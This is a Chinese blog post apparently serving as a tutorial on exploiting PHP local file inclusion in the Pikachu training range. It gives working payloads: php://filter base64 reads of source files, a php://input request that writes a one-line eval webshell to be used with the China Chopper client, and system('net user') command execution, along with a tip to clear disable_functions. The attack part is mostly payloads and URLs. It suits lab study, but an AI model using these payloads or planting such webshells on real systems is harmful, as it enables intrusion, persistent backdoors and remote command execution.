当前位置:网站首页>包含漏洞-读写文件以及执行命令
包含漏洞-读写文件以及执行命令
2022-08-08 06:50:00 【常家壮】
包含漏洞可以读写文件以及执行命令
读文件:
最好转化为base64,防止有特殊字符显示不出来
php://filter/read=convert.base64-encode/resource=【文件名】
用pikachu靶场演示:
读一下当前展示的这个PHP内容
写文件:
写入一句话木马 我用的是菜刀马 <?php @eval($_POST['123']);?>
需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
之后在数据包里写入一句话<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123]); ?>'); ?>
用菜刀连接:连接密码 123
由于是在当前文件夹写入的木马文件,所以是在fi_remote.php 同一目录下的
命令执行:
- phpStudy 只有在allow _url_include为on的时候才可以使用
- phpStudy 下找到php.ini打开,查找 disable_functions = 将其清空删掉重启apache 才能看到结果

需要修改一个地方 参数等于文件的地方 要改成 php://input
比如 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=file1.php
修改 http://192.168.56.128/pikachu/vul/fileinclude/fi_local.php?filename=php://input
提交数据包为:<?php system('net user');?>
边栏推荐
- 云服务器搭建MQTT消息代理EMQX
- 论文解读:《PST-PRNA:使用蛋白质表面地形和深度学习对RNA结合位点的预测》
- Detection of transcription factors binding to methylatedDNA by deep recurrent neural network
- 数据链路层------基于TCP/IP五层模型
- 论文解读:《Mouse4mC-BGRU:用于预测小鼠基因组中DNA N4-甲基胞嘧啶位点的深度学习》
- 阿里巴巴的三个“一”打通业务价值
- ES2020(ES11)新特性
- PHR-search:一个基于预测蛋白质层次关系的蛋白质远程同源性检测搜索框
- 脑筋急转弯
- Task 06 其它优秀的小工具
猜你喜欢
随机推荐
剪切字符串函数
论文解读:《PST-PRNA:使用蛋白质表面地形和深度学习对RNA结合位点的预测》
论文翻译:《6mAPred-MSFF:基于多尺度特征融合机制预测跨物种DNA N6-甲基腺嘌呤位点的深度学习模型》
用于一型糖尿病血糖调节的无模型iPID控制器
冒泡排序
BLE安全之配对流程剖析(2)
CAS详情汇总讲解
阿里巴巴的三个“一”打通业务价值
Gstreamer调试方式
归并排序
minikube addons enable ingress 启动错误
jupyter notebook处理文件导致IOPub data rate exceeded
用栈模拟队列
Zigbee常见错误问题汇总
物联网安全-单向散列算法
Properties文件的读取与保存
【Android安全】ActivityManager.isUserAMonkey API
ES2020(ES11)新特性
论文解读:iDRNA-ITF:基于诱导和转移框架识别蛋白质中的DNA和RNA结合残基
Day39------网络相关









